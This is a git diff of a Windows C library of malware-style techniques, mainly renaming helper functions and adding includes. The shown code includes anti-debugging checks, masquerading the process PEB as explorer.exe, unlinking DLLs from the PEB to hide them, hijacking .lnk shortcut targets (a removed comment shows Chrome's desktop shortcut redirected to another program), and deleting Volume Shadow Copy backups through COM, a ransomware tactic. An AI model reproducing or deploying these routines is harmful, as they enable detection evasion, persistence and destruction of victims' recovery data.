USHORT QpcData;
|
||||
struct {
|
||||
UCHAR QpcBypassEnabled;
|
||||
UCHAR QpcShift;
|
||||
};
|
||||
};
|
||||
LARGE_INTEGER TimeZoneBiasEffectiveStart;
|
||||
LARGE_INTEGER TimeZoneBiasEffectiveEnd;
|
||||
XSTATE_CONFIGURATION XState;
|
||||
KSYSTEM_TIME FeatureConfigurationChangeStamp;
|
||||
ULONG Spare;
|
||||
} KUSER_SHARED_DATA, * PKUSER_SHARED_DATA;
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsDebuggerPresentEx(VOID)
|
||||
{
|
||||
return GetPeb()->BeingDebugged;
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsIntelHardwareBreakpointPresent(VOID)
|
||||
{
|
||||
BOOL bFlag = FALSE;
|
||||
|
@ -11,7 +13,7 @@ BOOL IsIntelHardwareBreakpointPresent(VOID)
|
|||
|
||||
Context->ContextFlags = CONTEXT_DEBUG_REGISTERS;
|
||||
|
||||
if (!GetThreadContext(RfGetCurrentThread(), Context))
|
||||
if (!GetThreadContext(GetCurrentThreadEx(), Context))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (Context->Dr0 || Context->Dr1 || Context->Dr2 || Context->Dr3)
|
||||
|
@ -23,4 +25,4 @@ EXIT_ROUTINE:
|
|||
VirtualFree(Context, 0, MEM_RELEASE);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsNvidiaGraphicsCardPresentA(VOID)
|
||||
{
|
||||
DISPLAY_DEVICEA DisplayDevice; RtlZeroMemory(&DisplayDevice, sizeof(DISPLAY_DEVICEA));
|
||||
|
@ -29,4 +31,4 @@ BOOL IsNvidiaGraphicsCardPresentW(VOID)
|
|||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsPathValidA(PCHAR FilePath)
|
||||
{
|
||||
HANDLE hFile = INVALID_HANDLE_VALUE;
|
|
@ -1,3 +1,7 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
#include <psapi.h>
|
||||
|
||||
BOOL IsProcessRunningA(PCHAR ProcessNameWithExtension, BOOL IsCaseSensitive)
|
||||
{
|
||||
HANDLE hProcess = NULL;
|
||||
|
@ -98,4 +102,4 @@ BOOL IsProcessRunningW(PWCHAR ProcessNameWithExtension, BOOL IsCaseSensitive)
|
|||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL IsProcessRunningAsAdmin(VOID)
|
||||
{
|
||||
HANDLE hToken = NULL;
|
||||
|
@ -5,7 +7,7 @@ BOOL IsProcessRunningAsAdmin(VOID)
|
|||
DWORD dwSize = 0;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
if (!OpenProcessToken(RfGetCurrentProcess(), TOKEN_QUERY, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessEx(), TOKEN_QUERY, &hToken))
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &dwSize))
|
||||
|
@ -16,10 +18,10 @@ BOOL IsProcessRunningAsAdmin(VOID)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
EhSetLastError(ERROR_ACCESS_DENIED);
|
||||
SetLastErrorEx(ERROR_ACCESS_DENIED);
|
||||
|
||||
if (hToken)
|
||||
CloseHandle(hToken);
|
||||
|
||||
return (bFlag ? Elevation.TokenIsElevated : FALSE);
|
||||
}
|
||||
}
|
|
@ -0,0 +1,18 @@
|
|||
#include <Windows.h>
|
||||
#include "Internal.h"
|
||||
#include "StringManipulation.h"
|
||||
#include "Win32Helper.h"
|
||||
|
||||
/*
|
||||
TODO:
|
||||
--Ping 'IcmpSendEcho2Ex'
|
||||
|
||||
|
||||
*/
|
||||
|
||||
|
||||
int main(VOID)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
return ERROR_SUCCESS;
|
||||
}
|
|
@ -1,7 +1,5 @@
|
|||
/*
|
||||
Function to masquerade PEB originally by @FuzzySec / @Cneelis
|
||||
Optimized and unnecessary functionality removed by smelly__vx
|
||||
*/
|
||||
#include "Win32Helper.h"
|
||||
|
||||
BOOL MasqueradePebAsExplorerEx(VOID)
|
||||
{
|
||||
typedef NTSTATUS(NTAPI* RTLENTERCRITICALSECTION)(PRTL_CRITICAL_SECTION CriticalSection);
|
||||
|
@ -16,12 +14,12 @@ BOOL MasqueradePebAsExplorerEx(VOID)
|
|||
|
||||
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
|
||||
|
||||
hModule = RfGetModuleHandleW(L"ntdll.dll");
|
||||
hModule = GetModuleHandleExW(L"ntdll.dll");
|
||||
if (hModule == NULL)
|
||||
return FALSE;
|
||||
|
||||
RtlEnterCriticalSection = (RTLENTERCRITICALSECTION)RfGetProcAddressA((DWORD64)hModule, "RtlEnterCriticalSection");
|
||||
RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)RfGetProcAddressA((DWORD64)hModule, "RtlLeaveCriticalSection");
|
||||
RtlEnterCriticalSection = (RTLENTERCRITICALSECTION)GetProcAddressA((DWORD64)hModule, "RtlEnterCriticalSection");
|
||||
RtlLeaveCriticalSection = (RTLLEAVECRITICALSECTION)GetProcAddressA((DWORD64)hModule, "RtlLeaveCriticalSection");
|
||||
|
||||
if (!RtlEnterCriticalSection || !RtlLeaveCriticalSection)
|
||||
return FALSE;
|
||||
|
@ -33,10 +31,13 @@ BOOL MasqueradePebAsExplorerEx(VOID)
|
|||
|
||||
RtlInitUnicodeString(&Peb->ProcessParameters->ImagePathName, wExplorerPath);
|
||||
RtlInitUnicodeString(&Peb->ProcessParameters->CommandLine, wExplorerPath);
|
||||
|
||||
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Blink - 16);
|
||||
|
||||
RtlInitUnicodeString(&Module->FullDllName, wExplorerPath);
|
||||
RtlInitUnicodeString(&Module->BaseDllName, L"Explorer.exe");
|
||||
|
||||
RtlLeaveCriticalSection((PRTL_CRITICAL_SECTION)Peb->FastPebLock);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
|
|
@ -1,17 +1,15 @@
|
|||
/*
|
||||
LnkPath = L"C:\\Users\\User1\\Desktop\\Chrome.exe.lnk" <--- MUST BE .LNK!
|
||||
NewValue = L"C:\\Windows\\System32\\calc.exe"
|
||||
#include "Win32Helper.h"
|
||||
|
||||
Chrome.exe.lnk on desktop now launches calc.exe
|
||||
*/
|
||||
#include <shobjidl_core.h>
|
||||
#include <shlguid.h>
|
||||
|
||||
BOOL MpfComModifyShortcutTargetW(PWCHAR LnkPath, PWCHAR NewValue)
|
||||
BOOL MpfComModifyShortcutTargetW(PWCHAR LnkPath, PWCHAR LnkExecutionProperty)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
IShellLinkW* Shell = NULL;
|
||||
IPersistFile* Persist = NULL;
|
||||
BOOL bFlag = FALSE;
|
||||
WIN32_FIND_DATAW Dispose = {0};
|
||||
WIN32_FIND_DATAW Dispose = { 0 };
|
||||
WCHAR PathData[MAX_PATH * sizeof(WCHAR)] = { 0 };
|
||||
|
||||
if (CoInitialize(NULL) != S_OK)
|
||||
|
@ -34,7 +32,7 @@ BOOL MpfComModifyShortcutTargetW(PWCHAR LnkPath, PWCHAR NewValue)
|
|||
goto EXIT_ROUTINE;
|
||||
#pragma warning(pop)
|
||||
|
||||
if (Shell->SetPath(NewValue) != S_OK)
|
||||
if (Shell->SetPath(LnkExecutionProperty) != S_OK)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (Persist->Save(LnkPath, FALSE) != S_OK)
|
||||
|
@ -58,7 +56,7 @@ EXIT_ROUTINE:
|
|||
return bFlag;
|
||||
}
|
||||
|
||||
BOOL MpfComModifyShortcutTargetA(PCHAR LnkPath, PCHAR NewValue)
|
||||
BOOL MpfComModifyShortcutTargetA(PCHAR LnkPath, PCHAR LnkExecutionProperty)
|
||||
{
|
||||
HRESULT Result = S_OK;
|
||||
IShellLinkW* Shell = NULL;
|
||||
|
@ -73,7 +71,7 @@ BOOL MpfComModifyShortcutTargetA(PCHAR LnkPath, PCHAR NewValue)
|
|||
if (CharStringToWCharString(lpwLnkPath, LnkPath, StringLengthA(LnkPath)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CharStringToWCharString(lpwNewValue, NewValue, StringLengthA(NewValue)) == 0)
|
||||
if (CharStringToWCharString(lpwNewValue, LnkExecutionProperty, StringLengthA(LnkExecutionProperty)) == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (CoInitialize(NULL) != S_OK)
|
||||
|
@ -118,4 +116,4 @@ EXIT_ROUTINE:
|
|||
CoUninitialize();
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
}
|
|
@ -1,7 +1,5 @@
|
|||
/*
|
||||
#include "Win32Helper.h"
|
||||
|
||||
Credit: am0nsec
|
||||
*/
|
||||
|
||||
CONST IID IID_IVssCoordinator = { 0xda9f41d4, 0x1a5d, 0x41d0, {0xa6, 0x14, 0x6d, 0xfd, 0x78, 0xdf, 0x5d, 0x05} };
|
||||
CONST IID CLSID_CVssCoordinator = { 0xe579ab5f, 0x1cc4, 0x44b4, {0xbe, 0xd9, 0xde, 0x09, 0x91, 0xff, 0x06, 0x23} };
|
||||
|
@ -156,7 +154,7 @@ DWORD InitializeComWithSecurityContextDefault(BOOL DisableSeh)
|
|||
|
||||
EXIT_ROUTINE:
|
||||
|
||||
return EhWin32FromHResult(Result);
|
||||
return Win32FromHResult(Result);
|
||||
}
|
||||
|
||||
DWORD MpfComVssDeleteShadowVolumeBackups(BOOL CoUninitializeAfterCompletion)
|
||||
|
@ -210,8 +208,8 @@ DWORD MpfComVssDeleteShadowVolumeBackups(BOOL CoUninitializeAfterCompletion)
|
|||
if (Element.Type != VSS_OBJECT_SNAPSHOT)
|
||||
continue;
|
||||
|
||||
RtlZeroMemory(ShadowCopyId, (32 * sizeof(WCHAR)));
|
||||
RtlZeroMemory(ShadowCopySetId, (32 * sizeof(WCHAR)));
|
||||
ZeroMemoryEx(ShadowCopyId, (32 * sizeof(WCHAR)));
|
||||
ZeroMemoryEx(ShadowCopySetId, (32 * sizeof(WCHAR)));
|
||||
|
||||
#pragma warning( push )
|
||||
#pragma warning( disable : 6386)
|
||||
|
@ -231,10 +229,10 @@ DWORD MpfComVssDeleteShadowVolumeBackups(BOOL CoUninitializeAfterCompletion)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (ShadowCopyId)
|
||||
HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, ShadowCopyId);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, ShadowCopyId);
|
||||
|
||||
if (ShadowCopySetId)
|
||||
HeapFree(GetProcessHeap(), HEAP_ZERO_MEMORY, ShadowCopySetId);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, ShadowCopySetId);
|
||||
|
||||
if (EnumObject)
|
||||
EnumObject->Release();
|
||||
|
@ -245,5 +243,5 @@ EXIT_ROUTINE:
|
|||
if (CoUninitializeAfterCompletion)
|
||||
CoUninitialize();
|
||||
|
||||
return EhWin32FromHResult(Result);
|
||||
}
|
||||
return Win32FromHResult(Result);
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD OleGetClipboardDataA(PCHAR Buffer)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
|
@ -34,9 +36,9 @@ EXIT_ROUTINE:
|
|||
if (!bFlag)
|
||||
{
|
||||
if (Result != S_OK)
|
||||
dwError = EhWin32FromHResult(Result);
|
||||
dwError = Win32FromHResult(Result);
|
||||
else
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
}
|
||||
|
||||
#pragma warning( push )
|
||||
|
@ -88,9 +90,9 @@ EXIT_ROUTINE:
|
|||
if (!bFlag)
|
||||
{
|
||||
if (Result != S_OK)
|
||||
dwError = EhWin32FromHResult(Result);
|
||||
dwError = Win32FromHResult(Result);
|
||||
else
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
}
|
||||
|
||||
#pragma warning( push )
|
||||
|
@ -103,4 +105,4 @@ EXIT_ROUTINE:
|
|||
DataObject->Release();
|
||||
|
||||
return dwError;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PVOID UserDefinedCallbackRoutineA(LPCSTR Path)
|
||||
{
|
||||
return 0;
|
||||
|
@ -8,7 +10,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID p
|
|||
typedef LPWSTR(WINAPI* PATHCOMBINEA)(LPCSTR, LPCSTR, LPCSTR);
|
||||
PATHCOMBINEA PathCombineA = (PATHCOMBINEA)pfnPathCombineW;
|
||||
|
||||
HANDLE HeapHandle = RfGetProcessHeap();
|
||||
HANDLE HeapHandle = GetProcessHeapEx();
|
||||
CHAR szFullPattern[MAX_PATH] = { 0 };
|
||||
WIN32_FIND_DATAA FindData = { 0 };
|
||||
HANDLE FindHandle = INVALID_HANDLE_VALUE;
|
||||
|
@ -31,7 +33,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID p
|
|||
if (FindData.cFileName[0] == '$')
|
||||
continue;
|
||||
|
||||
RfZeroMemory(szFullPattern, MAX_PATH);
|
||||
ZeroMemoryEx(szFullPattern, MAX_PATH);
|
||||
if (PathCombineA(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -52,7 +54,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID p
|
|||
|
||||
do
|
||||
{
|
||||
RfZeroMemory(szFullPattern, MAX_PATH);
|
||||
ZeroMemoryEx(szFullPattern, MAX_PATH);
|
||||
if (!(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
|
||||
{
|
||||
if (PathCombineA(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
|
@ -88,7 +90,7 @@ BOOL RecursiveFindFileA(LPCSTR Path, LPCSTR Pattern)
|
|||
BOOL bIsNewlyLoaded = FALSE;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hShlwapi = RfGetModuleHandleW(L"Shlwapi.dll");
|
||||
hShlwapi = GetModuleHandleExW(L"Shlwapi.dll");
|
||||
if (hShlwapi == NULL)
|
||||
{
|
||||
bIsNewlyLoaded = TRUE;
|
||||
|
@ -97,7 +99,7 @@ BOOL RecursiveFindFileA(LPCSTR Path, LPCSTR Pattern)
|
|||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
PathCombineA = (PATHCOMBINEA)RfGetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
PathCombineA = (PATHCOMBINEA)GetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
if (PathCombineA == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -121,7 +123,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID
|
|||
typedef LPWSTR(WINAPI* PATHCOMBINEW)(LPCWSTR, LPCWSTR, LPCWSTR);
|
||||
PATHCOMBINEW PathCombineW = (PATHCOMBINEW)pfnPathCombineW;
|
||||
|
||||
HANDLE HeapHandle = RfGetProcessHeap();
|
||||
HANDLE HeapHandle = GetProcessHeapEx();
|
||||
WCHAR szFullPattern[MAX_PATH] = { 0 };
|
||||
WIN32_FIND_DATAW FindData = { 0 };
|
||||
HANDLE FindHandle = INVALID_HANDLE_VALUE;
|
||||
|
@ -143,7 +145,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID
|
|||
if (FindData.cFileName[0] == '$')
|
||||
continue;
|
||||
|
||||
RfZeroMemory(szFullPattern, MAX_PATH);
|
||||
ZeroMemoryEx(szFullPattern, MAX_PATH);
|
||||
if (PathCombineW(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -164,7 +166,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID
|
|||
|
||||
do
|
||||
{
|
||||
RfZeroMemory(szFullPattern, MAX_PATH);
|
||||
ZeroMemoryEx(szFullPattern, MAX_PATH);
|
||||
if (!(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
|
||||
{
|
||||
if (PathCombineW(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
|
@ -200,7 +202,7 @@ BOOL RecursiveFindFileW(LPCWSTR Path, LPCWSTR Pattern)
|
|||
BOOL bIsNewlyLoaded = FALSE;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hShlwapi = RfGetModuleHandleW(L"Shlwapi.dll");
|
||||
hShlwapi = GetModuleHandleExW(L"Shlwapi.dll");
|
||||
if (hShlwapi == NULL)
|
||||
{
|
||||
bIsNewlyLoaded = TRUE;
|
||||
|
@ -209,7 +211,7 @@ BOOL RecursiveFindFileW(LPCWSTR Path, LPCWSTR Pattern)
|
|||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
PathCombineW = (PATHCOMBINEW)RfGetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
PathCombineW = (PATHCOMBINEW)GetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
if (PathCombineW == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -221,4 +223,4 @@ EXIT_ROUTINE:
|
|||
FreeLibrary(hShlwapi);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
void RfRemoveEntryList(LIST_ENTRY* Entry)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
VOID RemoveEntryList(LIST_ENTRY* Entry)
|
||||
{
|
||||
if (Entry != NULL) {
|
||||
PLIST_ENTRY OldFlink;
|
||||
|
@ -12,7 +14,7 @@ void RfRemoveEntryList(LIST_ENTRY* Entry)
|
|||
}
|
||||
}
|
||||
|
||||
BOOL RfRemoveDllFromPebW(LPCWSTR lpModuleName) {
|
||||
BOOL RemoveDllFromPebW(LPCWSTR lpModuleName) {
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
||||
|
@ -31,19 +33,17 @@ BOOL RfRemoveDllFromPebW(LPCWSTR lpModuleName) {
|
|||
RemoveEntryList(&Module->InInitializationOrderModuleList);
|
||||
RemoveEntryList(&Module->InMemoryOrderModuleList);
|
||||
RemoveEntryList(&Module->HashTableEntry);
|
||||
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
Next = Next->Flink;
|
||||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
BOOL RfRemoveDllFromPebA(LPCSTR lpModuleName) {
|
||||
BOOL RemoveDllFromPebA(LPCSTR lpModuleName) {
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
CHAR wDllName[64] = { 0 };
|
||||
|
@ -56,11 +56,10 @@ BOOL RfRemoveDllFromPebA(LPCSTR lpModuleName) {
|
|||
Module = (PLDR_MODULE)((PBYTE)Next - 16);
|
||||
if (Module->BaseDllName.Buffer != NULL)
|
||||
{
|
||||
RfZeroMemory(wDllName, sizeof(wDllName));
|
||||
ZeroMemoryEx(wDllName, sizeof(wDllName));
|
||||
WCharStringToCharString(wDllName, Module->BaseDllName.Buffer, 64);
|
||||
if (StringCompareA(lpModuleName, Module->BaseDllName.Buffer) == 0)
|
||||
if (StringCompareA(lpModuleName, wDllName) == 0)
|
||||
{
|
||||
|
||||
RemoveEntryList(&Module->InLoadOrderModuleList);
|
||||
RemoveEntryList(&Module->InInitializationOrderModuleList);
|
||||
RemoveEntryList(&Module->InMemoryOrderModuleList);
|
||||
|
@ -68,11 +67,9 @@ BOOL RfRemoveDllFromPebA(LPCSTR lpModuleName) {
|
|||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
Next = Next->Flink;
|
||||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
VOID RtlInitEmptyUnicodeString(PUNICODE_STRING UnicodeString, PWCHAR Buffer, USHORT BufferSize)
|
||||
{
|
||||
UnicodeString->Length = 0;
|
||||
|
@ -5,4 +7,4 @@ VOID RtlInitEmptyUnicodeString(PUNICODE_STRING UnicodeString, PWCHAR Buffer, USH
|
|||
UnicodeString->Buffer = Buffer;
|
||||
|
||||
return;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
VOID RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString)
|
||||
{
|
||||
SIZE_T DestSize;
|
||||
|
@ -15,4 +17,4 @@ VOID RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString
|
|||
}
|
||||
|
||||
DestinationString->Buffer = (PWCHAR)SourceString;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL RtlLoadPeHeaders(PIMAGE_DOS_HEADER* Dos, PIMAGE_NT_HEADERS* Nt, PIMAGE_FILE_HEADER* File, PIMAGE_OPTIONAL_HEADER* Optional, PBYTE* ImageBase)
|
||||
{
|
||||
*Dos = (PIMAGE_DOS_HEADER)*ImageBase;
|
||||
|
@ -12,4 +14,4 @@ BOOL RtlLoadPeHeaders(PIMAGE_DOS_HEADER* Dos, PIMAGE_NT_HEADERS* Nt, PIMAGE_FILE
|
|||
*Optional = (PIMAGE_OPTIONAL_HEADER)((PBYTE)*File + sizeof(IMAGE_FILE_HEADER));
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
PCHAR SecureStringCopyA(PCHAR String1, LPCSTR String2, SIZE_T Size)
|
||||
{
|
||||
PCHAR pChar = String1;
|
||||
|
@ -14,4 +16,4 @@ PWCHAR SecureStringCopyW(PWCHAR String1, LPCWSTR String2, SIZE_T Size)
|
|||
while (Size-- && (*String1++ = *String2++) != '\0');
|
||||
|
||||
return pChar;
|
||||
}
|
||||
}
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue